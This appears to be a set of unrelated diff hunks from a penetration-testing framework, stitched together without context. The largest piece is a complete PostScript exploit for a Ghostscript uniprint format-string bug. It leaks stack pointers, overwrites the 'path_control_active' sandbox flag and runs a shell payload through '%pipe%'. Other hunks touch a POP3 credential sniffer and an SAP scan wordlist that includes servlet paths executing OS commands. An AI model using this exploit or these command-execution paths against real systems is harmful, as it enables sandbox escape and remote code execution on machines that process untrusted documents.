+               <b style="background:aquamarine">,<b style="background:magenta">,
+               <b style="background:palegreen">,<b style="background:coral">,
+               <b style="background:wheat">,<b style="background:khaki">,
+               <b style="background:lime">,<b style="background:deepskyblue">]]></str>
+          <str name="hl.tag.post"><![CDATA[</b>]]></str>
+        </lst>
+      </fragmentsBuilder>
+
+      <boundaryScanner name="default"
+                       default="true"
+                       class="solr.highlight.SimpleBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.maxScan">10</str>
+          <str name="hl.bs.chars">.,!? &#9;&#10;&#13;</str>
+        </lst>
+      </boundaryScanner>
+
+      <boundaryScanner name="breakIterator"
+                       class="solr.highlight.BreakIteratorBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.type">WORD</str>
+          <str name="hl.bs.language">en</str>
+          <str name="hl.bs.country">US</str>
+        </lst>
+      </boundaryScanner>
+    </highlighting>
+  </searchComponent>
+
+  <updateProcessor class="solr.UUIDUpdateProcessorFactory" name="uuid"/>
+  <updateProcessor class="solr.RemoveBlankFieldUpdateProcessorFactory" name="remove-blank"/>
+  <updateProcessor class="solr.FieldNameMutatingUpdateProcessorFactory" name="field-name-mutating">
+    <str name="pattern">[^\w-\.]</str>
+    <str name="replacement">_</str>
+  </updateProcessor>
+  <updateProcessor class="solr.ParseBooleanFieldUpdateProcessorFactory" name="parse-boolean"/>
+  <updateProcessor class="solr.ParseLongFieldUpdateProcessorFactory" name="parse-long"/>
+  <updateProcessor class="solr.ParseDoubleFieldUpdateProcessorFactory" name="parse-double"/>
+  <updateProcessor class="solr.ParseDateFieldUpdateProcessorFactory" name="parse-date">
+    <arr name="format">
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[,SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[,SSS]][z</str>
+      <str>[EEE, ]dd MMM yyyy HH:mm[:ss] z</str>
+      <str>EEEE, dd-MMM-yy HH:mm:ss z</str>
+      <str>EEE MMM ppd HH:mm:ss [z ]yyyy</str>
+    </arr>
+  </updateProcessor>
+  <updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.String</str>
+      <str name="fieldType">text_general</str>
+      <lst name="copyField">
+        <str name="dest">*_str</str>
+        <int name="maxChars">256</int>
+      </lst>
+      <bool name="default">true</bool>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Boolean</str>
+      <str name="fieldType">booleans</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.util.Date</str>
+      <str name="fieldType">pdates</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Long</str>
+      <str name="valueClass">java.lang.Integer</str>
+      <str name="fieldType">plongs</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Number</str>
+      <str name="fieldType">pdoubles</str>
+    </lst>
+  </updateProcessor>
+
+  <updateRequestProcessorChain name="add-unknown-fields-to-the-schema" default="${update.autoCreateFields:true}"
+           processor="uuid,remove-blank,field-name-mutating,parse-boolean,parse-long,parse-double,parse-date,add-schema-fields">
+    <processor class="solr.LogUpdateProcessorFactory"/>
+    <processor class="solr.DistributedUpdateProcessorFactory"/>
+    <processor class="solr.RunUpdateProcessorFactory"/>
+  </updateRequestProcessorChain>
+
+</config>
@@ -0,0 +1,297 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%Pages: 1
+%%BoundingBox:   36   36  576  756
+%%LanguageLevel: 1
+%%EndComments
+%%BeginProlog
+%%EndProlog
+
+% Make sure to restore the original `setpagedevice` from userdict or systemdict
+% in case it has been redefined in another postscript file.
+% This happens with ImageMagick for example.
+userdict begin
+systemdict /setpagedevice known
+{
+        /setpagedevice systemdict /setpagedevice get def
+}
+if
+end
+
+% ====== Configuration ======
+
+% Offset of `gp_file *out` on the stack
+/IdxOutPtr MSF_IDXOUTPTR  def
+
+
+% ====== General Postscript utility functions ======
+
+% from: https://github.com/scriptituk/pslutils/blob/master/string.ps
+/cat {
+	exch
+	dup length 2 index length add string
+	dup dup 5 2 roll
+	copy length exch putinterval
+} bind def
+
+% from: https://rosettacode.org/wiki/Repeat_a_string#PostScript
+/times {
+  dup length dup    % rcount ostring olength olength
+  4 3 roll          % ostring olength olength rcount
+  mul dup string    % ostring olength flength fstring
+  4 1 roll          % fstring ostring olength flength
+  1 sub 0 3 1 roll  % fstring ostring 0 olength flength_minus_one 
+  {                 % fstring ostring iter
+    1 index 3 index % fstring ostring iter ostring fstring
+    3 1 roll        % fstring ostring fstring iter ostring
+    putinterval     % fstring ostring
+  } for
+  pop               % fstring
+} def
+
+% Printing helpers
+% /println { print (\012) print } bind def
+% /printnumln { =string cvs println } bind def
+
+% ====== Start of exploit helper code ======
+
+% Make a new tempfile but only save its path. This gives us a file path to read/write 
+% which will exist as long as this script runs. We don't actually use the file object
+% (hence `pop`) because we're passing the path to uniprint and reopening it ourselves.
+/PathTempFile () (w+) .tempfile pop def
+
+
+% Convert hex string "4142DEADBEEF" to padded little-endian byte string <EFBEADDE42410000>
+% <HexStr> str_ptr_to_le_bytes <ByteStringLE>
+/str_ptr_to_le_bytes {
+	% Convert hex string argument to Postscript string
+	% using <DEADBEEF> notation
+	/ArgBytes exch (<) exch (>) cat cat token pop exch pop def
+
+	% Prepare resulting string (`string` fills with zeros)
+	/Res 8 string def
+
+	% For every byte in the input
+	0 1 ArgBytes length 1 sub {
+		/i exch def
+
+		% put byte at index (len(ArgBytes) - 1 - i)
+		Res ArgBytes length 1 sub i sub ArgBytes i get put
+	} for
+
+	Res % return
+} bind def
+
+
+% <StackString> <FmtString> do_uniprint <LeakedData>
+/do_uniprint {
+	/FmtString exch def
+	/StackString exch def
+
+	% Select uniprint device with our payload
+	<<
+		/OutputFile PathTempFile
+		/OutputDevice /uniprint
+		/upColorModel /DeviceCMYKgenerate
+		/upRendering /FSCMYK32
+		/upOutputFormat /Pcl
+		/upOutputWidth 99999
+		/upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings
+		/upYMoveCommand FmtString
+	>>
+	setpagedevice
+
+	% Manipulate the interpreter to put a recognizable piece of data on the stack
+	(%%__) StackString cat .runstring
+
+	% Produce a page with some content to trigger uniprint logic
+	newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke
+	showpage
+
+	% Read back the written data
+	/InFile PathTempFile (r) file def
+	/LeakedData InFile 4096 string readstring pop def
+	InFile closefile
+
+	LeakedData % return
+} bind def
+
+
+% get_index_of_controllable_stack <Idx>
+/get_index_of_controllable_stack {
+	% A recognizable token on the stack to search for
+	/SearchToken (ABABABAB) def
+
+	% Construct "1:%lx,2:%lx,3:%lx,...,400:%lx,"
+	/FmtString 0 string 1 1 400 { 3 string cvs (:%lx,) cat cat } for def
+
+	SearchToken FmtString do_uniprint
+
+	% Search for ABABABAB => 4241424142414241 (assume LE)
+	(4241424142414241) search {
+		exch pop
+		exch pop
+		% <pre> is left
+
+		% Search for latest comma in <pre> to get e.g. `123:` as <post>
+		(,) rsearch pop pop pop
+
+		% Search for colon and use <pre> to get `123`
+		(:) search pop exch pop exch pop
+
+		% return as int
+		cvi
+	} {
+		% (Could not find our data on the stack.. exiting) println
+		quit
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> write_to
+/write_to {
+	/AddrHex exch str_ptr_to_le_bytes def % address to write to
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (_%ln) cat def
+
+	AddrHex FmtString do_uniprint
+
+	pop % we don't care about formatted data
+} bind def
+
+
+% <StackIdx> read_ptr_at <PtrHexStr>
+/read_ptr_at {
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def
+
+	() FmtString do_uniprint
+
+	(__) search pop pop pop (__) search pop exch pop exch pop
+} bind def
+
+
+% num_bytes <= 9
+% <StackIdx> <PtrHex> <NumBytes> read_dereferenced_bytes_at <ResultAsMultipliedInt>
+/read_dereferenced_bytes_at {
+	/NumBytes exch def
+	/PtrHex exch def
+	/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def
+
+	PtrOct FmtString do_uniprint
+
+	/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def
+
+	% Check if we were able to read all bytes
+	Data length NumBytes eq {
+		% Yes we did! So return the integer conversion of the bytes
+		0 % accumulator
+		NumBytes 1 sub -1 0 {
+			exch % <i> <accum>
+			256 mul exch % <accum*256> <i>
+			Data exch get % <accum*256> <Data[i]>
+			add % <accum*256 + Data[i]>
+		} for
+	} {
+		% We did not read all bytes, add a null byte and recurse on addr+1
+		StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
+		256 mul
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> read_dereferenced_ptr_at <PtrHexStr>
+/read_dereferenced_ptr_at {
+	% Read 6 bytes
+	6 read_dereferenced_bytes_at
+
+	% Convert to hex string and return
+	16 12 string cvrs
+} bind def
+
+
+% <Offset> <PtrHexStr> ptr_add_offset <PtrHexStr>
+/ptr_add_offset {
+	/PtrHexStr exch def % hex string pointer
+	/Offset exch def % integer to add
+
+	/PtrNum (16#) PtrHexStr cat cvi def
+
+	% base 16, string length 12
+	PtrNum Offset add 16 12 string cvrs
+} bind def
+
+
+% () println
+
+% ====== Start of exploit logic ======
+
+
+% Find out the index of the controllable bytes
+% This is around the 200-300 range but differs per binary/version
+/IdxStackControllable get_index_of_controllable_stack def
+% (Found controllable stack region at index: ) print IdxStackControllable printnumln
+
+% Exploit steps:
+% - `gp_file *out` is at stack index `IdxOutPtr`.
+%
+% - Controllable data is at index `IdxStackControllable`.
+%
+% - We want to find out the address of:
+%       out->memory->gs_lib_ctx->core->path_control_active
+%   hence we need to dereference and add ofsets a few times
+%
+% - Once we have the address of `path_control_active`, we use
+%   our write primitive to write an integer to its address - 3
+%   such that the most significant bytes (zeros) of that integer
+%   overwrite `path_control_active`, setting it to 0.
+%
+% - Finally, with `path_control_active` disabled, we can use
+%   the built-in (normally sandboxed) `%pipe%` functionality to
+%   run shell commands
+
+
+/PtrOut IdxOutPtr read_ptr_at def
+
+% (out: 0x) PtrOut cat println
+
+
+% memory is at offset 144 in out
+/PtrOutOffset 144 PtrOut ptr_add_offset def
+/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def
+
+% (out->mem: 0x) PtrMem cat println
+
+% gs_lib_ctx is at offset 208 in memory
+/PtrMemOffset 208 PtrMem ptr_add_offset def
+/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx: 0x) PtrGsLibCtx cat println
+
+% core is at offset 8 in gs_lib_ctx
+/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
+/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx->core: 0x) PtrCore cat println
+
+% path_control_active is at offset 156 in core
+/PtrPathControlActive 156 PtrCore ptr_add_offset def
+
+% (out->mem->gs_lib_ctx->core->path_control_active: 0x) PtrPathControlActive cat println
+
+% Subtract a bit from the address to make sure we write a null over the field
+/PtrTarget -3 PtrPathControlActive ptr_add_offset def
+
+% And overwrite it!
+IdxStackControllable PtrTarget write_to
+
+
+% And now `path_control_active` == 0, so we can use %pipe%
+
+(%pipe%MSF_PAYLOAD) (r) file
+
+quit
@@ -553,7 +553,7 @@ void createStackWriteFormatString(
  formatBuffer+=result;
  bufferSize-=result;

-// Write the LABEL 6 more times, thus multiplying the the single
+// Write the LABEL 6 more times, thus multiplying the single
 // byte write pointer to an 8-byte aligned argv-list pointer and
 // update argv[0] to point to argv[1..n].
  writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
@@ -38,6 +38,10 @@ class SnifferPOP3 < BaseProtocolParser
          case s[:last]
            when nil
              # Its the first +OK must include the banner, worst case its just +OK
+
+              # Strip the banner, so that we don't need to do it multiple times
+              # We can improve the banner by removing the +OK part
+              s[:banner] = matches.strip
              s[:info]  = matches
              s[:proto] = "tcp"
              s[:name]  = "pop3"
@@ -62,7 +66,7 @@ class SnifferPOP3 < BaseProtocolParser
                :proof => s[:extra],
                :status => Metasploit::Model::Login::Status::SUCCESSFUL
              )
-              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")

              # Remove it form the session objects so freeup
              sessions.delete(s[:session])
@@ -91,7 +95,7 @@ class SnifferPOP3 < BaseProtocolParser
                :proof => s[:extra],
                :status => Metasploit::Model::Login::Status::INCORRECT
              )
-              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")
              s[:pass]=""
          end
        when nil
@@ -0,0 +1,188 @@
+[
+  {
+    "name": "v0.7.1",
+    "commit": {
+      "sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
+    }
+  },
+  {
+    "name": "v0.7.0",
+    "commit": {
+      "sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
+    }
+  },
+  {
+    "name": "v0.6.2",
+    "commit": {
+      "sha": "b0c367cac7211117e88a55517396764036ac0552"
+    }
+  },
+  {
+    "name": "v0.6.1",
+    "commit": {
+      "sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
+    }
+  },
+  {
+    "name": "v0.6.0",
+    "commit": {
+      "sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
+    }
+  },
+  {
+    "name": "v0.5.0",
+    "commit": {
+      "sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
+    }
+  },
+  {
+    "name": "v0.4.0",
+    "commit": {
+      "sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
+    }
+  },
+  {
+    "name": "v0.3.3",
+    "commit": {
+      "sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
+    }
+  },
+  {
+    "name": "v0.3.2",
+    "commit": {
+      "sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
+    }
+  },
+  {
+    "name": "v0.3.1",
+    "commit": {
+      "sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
+    }
+  },
+  {
+    "name": "v0.3.0",
+    "commit": {
+      "sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
+    }
+  },
+  {
+    "name": "v0.2.1",
+    "commit": {
+      "sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
+    }
+  },
+  {
+    "name": "v0.2.0",
+    "commit": {
+      "sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
+    }
+  },
+  {
+    "name": "v0.1.0",
+    "commit": {
+      "sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
+    }
+  },
+  {
+    "name": "v0.0.10",
+    "commit": {
+      "sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
+    }
+  },
+  {
+    "name": "v0.0.9",
+    "commit": {
+      "sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
+    }
+  },
+  {
+    "name": "v0.0.8",
+    "commit": {
+      "sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
+    }
+  },
+  {
+    "name": "v0.0.7",
+    "commit": {
+      "sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
+    }
+  },
+  {
+    "name": "v0.0.6",
+    "commit": {
+      "sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
+    }
+  },
+  {
+    "name": "v0.0.5",
+    "commit": {
+      "sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
+    }
+  },
+  {
+    "name": "v0.0.4",
+    "commit": {
+      "sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
+    }
+  },
+  {
+    "name": "v0.0.3",
+    "commit": {
+      "sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
+    }
+  },
+  {
+    "name": "v0.0.2",
+    "commit": {
+      "sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
+    }
+  },
+  {
+    "name": "v0.0.1",
+    "commit": {
+      "sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.1",
+    "commit": {
+      "sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.0",
+    "commit": {
+      "sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.2",
+    "commit": {
+      "sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.1",
+    "commit": {
+      "sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.0",
+    "commit": {
+      "sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.4",
+    "commit": {
+      "sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.3",
+    "commit": {
+      "sha": "cbb166026d8c6360836def9bf9c208313023961c"
+    }
+  }
+]
@@ -83,6 +83,8 @@
 <% description = "The module is expected to get a shell every time it runs." %>
 <% elsif reliability == "unreliable-session" %>
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
+<% elsif reliability == "event-dependent" %>
+<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -88,6 +88,7 @@ strtab:
 db 0
 db 0
 strtabsz equ $ - strtab
+
+align 16
 global _start
 _start:
-
@@ -1,3 +1,7 @@
+/@download@
+/ADS-EJB
+/ADS-License
+/AE/index.jsp
 /AdapterFramework/version/version.jsp
 /AdminTools/
 /Adobe
@@ -5,64 +9,26 @@
 /AdobeDocumentServices/Config?wsdl
 /AdobeDocumentServices/Grmg
 /AdobeDocumentServicesSec/Config
-/ADS-EJB
-/ADS-License
-/AE/index.jsp
 /AnalyticalReporting/
 /AnalyticalReporting/AnalyticalReporting_merge_web.xml
 /AnalyticalReporting/download/win32/websetup.properties
-/apidocs/
-/apidocs/allclasses-frame.html
-/apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
-/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
 /ApplicationAdminProvider
-/bcb/
-/bcb/bcbadmHome.jsp
-/bcb/bcbadmNavigation.jsp
-/bcb/bcbadmSettings.jsp
-/bcb/bcbadmStart.jsp
-/bcb/bcbadmSystemInfo.jsp
-/bcbtest/start.jsp
 /BI_UDC
 /BizcCommLayerAuthoring/Config1
 /BizcCommLayerAuthoring/Config1?wsdl
 /BizcCommLayerAuthoring/Config?wsdl
-/bwtest
-/caf
 /CAFDataService/Config
 /CAFDataService/Config?wsdl
-/ccsui
-/CmcApp/logon.faces
 /CMSRTS/Config1
 /CMSRTS/Config1?wsdl
 /CMSRTS/Config?wsdl
-/com~tc~lm~webadmin~httpprovider~web
+/CmcApp/logon.faces
 /CrystalReports/viewrpt.cwr
-/ctc
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 /DataArchivingService
-/dispatcher
-/@download@
-/dswsbobje
-/dswsbobje/services/BICatalog?wsdl
-/dswsbobje/services/listServices
-/examples/
-/examples_frame.html
-/examples.html
-/exchangeProfile/
 /GRMGHeartBeat
 /GRMGWSTest/service
 /GRMGWSTest/service?wsdl
-/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
-/htmlb/
-/htmlb/docs/api/index.html
-/htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
+/IGSCustomizingXML
 /IciActionItemService/IciActionItemConf
 /IciActionItemService/IciActionItemConf?wsdl
 /IciChatLineService/IciChatLineConf
@@ -86,11 +52,67 @@
 /IciSystemService/IciSystemConf?wsdl
 /IciUserService/IciUserConf
 /IciUserService/IciUserConf?wsdl
-/IGSCustomizingXML
-/index.html
 /InfoViewApp/
 /InfoViewApp/help/en/user/html/
 /InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
+/KW
+/Lighthammer
+/Modeler
+/OpenSQLMonitors/
+/PerformacetraceTraceApplication
+/RE/index.jsp
+/SAPIKS
+/SAPIKS2
+/SAPIKS2/contentShow.sap
+/SAPIKS2/jsp/adminShow.jsp
+/SAPIrExtHelp
+/SLDStart/plain
+/SLDStart/secure
+/SQLtrace/index.html
+/TOdbo
+/TSapq
+/TXmla
+/TestJDBC_Web
+/VC
+/WSConnector/Config1
+/WSConnector/Config1?wsdl
+/WSConnector/Config?wsdl
+/apidocs/
+/apidocs/allclasses-frame.html
+/apidocs/com/sap/engine/connector/connection/IConnection.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+/bcb/
+/bcb/bcbadmHome.jsp
+/bcb/bcbadmNavigation.jsp
+/bcb/bcbadmSettings.jsp
+/bcb/bcbadmStart.jsp
+/bcb/bcbadmSystemInfo.jsp
+/bcbtest/start.jsp
+/bwtest
+/caf
+/ccsui
+/com~tc~lm~webadmin~httpprovider~web
+/ctc
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+/dispatcher
+/dswsbobje
+/dswsbobje/services/BICatalog?wsdl
+/dswsbobje/services/listServices
+/examples.html
+/examples/
+/examples_frame.html
+/exchangeProfile/
+/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+/htmlb/
+/htmlb/docs/api/index.html
+/htmlb/index.html
+/htmlb/jsp/index.jsp
+/htmlb/moresamples.html
+/htmlb/samples.html
+/index.html
 /inspection.wsil
 /ipcpricing/ui/
 /irj
@@ -111,32 +133,26 @@
 /irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
 /irj/servlet/prt/portal/prtroot/pcd!(*)
 /irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
-/KW
-/Lighthammer
 /logon
 /logon/index.jsp
 /logon/logonServlet
-/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
+/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
+/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
 /main.html
 /meSync/HttpGRMGTest.html
 /mmr/
 /mmr/mmr/MMRUI.html
-/Modeler
 /modeller/
 /modeller/index.html
 /monitoring
 /monitoring/SystemInfo
 /nwa
-/OpenSQLMonitors/
-/PerformacetraceTraceApplication
 /performanceProvierRoot
 /pmi
 /portal
 /portalapps
-/RE/index.jsp
 /rep/build_info.html
 /rep/build_info.jsp
 /rep/start/index.jsp
@@ -147,9 +163,24 @@
 /samlssodemo_dest
 /samlssodemo_source
 /sap/
+/sap/BSSP_SP_MAPS
+/sap/IStest
 /sap/admin
 /sap/admin/public/index.html
 /sap/ap
+/sap/bc/FormToRfc
+/sap/bc/FormToRfc/soap
+/sap/bc/IDoc_XML
+/sap/bc/MIDSD
+/sap/bc/MJC
+/sap/bc/MJC/
+/sap/bc/MJC/mi_host
+/sap/bc/MJC/mi_mds
+/sap/bc/MJC/mi_service
+/sap/bc/MJC/mi_services
+/sap/bc/MY_NEW_SERV99
+/sap/bc/Mi_host_http
+/sap/bc/Mime
 /sap/bc/abap/demo
 /sap/bc/abap/demo_apc
 /sap/bc/abap/demo_apc_pcp
@@ -184,34 +215,34 @@
 /sap/bc/bsp/sap/certmap
 /sap/bc/bsp/sap/certreq
 /sap/bc/bsp/sap/crm_bsp_frame
+/sap/bc/bsp/sap/crm_ic_ise/editor
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/crmcmp_bpident/
 /sap/bc/bsp/sap/crmcmp_brfcase
 /sap/bc/bsp/sap/crmcmp_hdr
 /sap/bc/bsp/sap/crmcmp_hdr_std
 /sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/crm_ic_ise/editor
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
-/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
 /sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
+/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
 /sap/bc/bsp/sap/iccmp_hdr_cntnt
 /sap/bc/bsp/sap/iccmp_header
 /sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
 /sap/bc/bsp/sap/it00/default.htm
 /sap/bc/bsp/sap/it00/http_client.htm
 /sap/bc/bsp/sap/it00/http_client_xml.htm
-/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/FAA
+/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/public/sem
 /sap/bc/bsp/sap/sam_demo
@@ -221,17 +252,17 @@
 /sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/spi_admin
 /sap/bc/bsp/sap/spi_monitor
-/sap/bc/bsp/sapsrm
-/sap/bc/bsp/sapsrm/bsp_dhtml_apple
-/sap/bc/bsp/sapsrm/bsp_java_applet
-/sap/bc/bsp/sapsrm/call_sig_ctrl
-/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/bsp/sap/sxms_alertrules
 /sap/bc/bsp/sap/system
 /sap/bc/bsp/sap/thtmlb_scripts
 /sap/bc/bsp/sap/thtmlb_styles
 /sap/bc/bsp/sap/uicmp_ltx
 /sap/bc/bsp/sap/xmb_bsp_log
+/sap/bc/bsp/sapsrm
+/sap/bc/bsp/sapsrm/bsp_dhtml_apple
+/sap/bc/bsp/sapsrm/bsp_java_applet
+/sap/bc/bsp/sapsrm/call_sig_ctrl
+/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/contentserver
 /sap/bc/docu
 /sap/bc/echo
@@ -249,23 +280,10 @@
 /sap/bc/erecruiting/verification
 /sap/bc/error
 /sap/bc/error 
-/sap/bc/FormToRfc
-/sap/bc/FormToRfc/soap
 /sap/bc/graphics/net
 /sap/bc/gui/sap/its/CERTREQ
 /sap/bc/gui/sap/its/designs
 /sap/bc/gui/sap/its/webgui
-/sap/bc/IDoc_XML
-/sap/bc/MIDSD
-/sap/bc/Mi_host_http
-/sap/bc/Mime
-/sap/bc/MJC
-/sap/bc/MJC/
-/sap/bc/MJC/mi_host
-/sap/bc/MJC/mi_mds
-/sap/bc/MJC/mi_service
-/sap/bc/MJC/mi_services
-/sap/bc/MY_NEW_SERV99
 /sap/bc/ping
 /sap/bc/report
 /sap/bc/soap/ici
@@ -276,19 +294,23 @@
 /sap/bc/wdvd
 /sap/bc/wdvd/
 /sap/bc/webdynpro
+/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+/sap/bc/webdynpro/sap/WDR_TEST_TABLE
+/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webdynpro/sap/apb_launchpad
 /sap/bc/webdynpro/sap/apb_launchpad_nwbc
 /sap/bc/webdynpro/sap/apb_lpd_light_start
 /sap/bc/webdynpro/sap/apb_lpd_start_url
-/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/appl_log_trc_viewer
 /sap/bc/webdynpro/sap/appl_soap_management
+/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 /sap/bc/webdynpro/sap/cnp_light_test
 /sap/bc/webdynpro/sap/configure_application
 /sap/bc/webdynpro/sap/configure_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
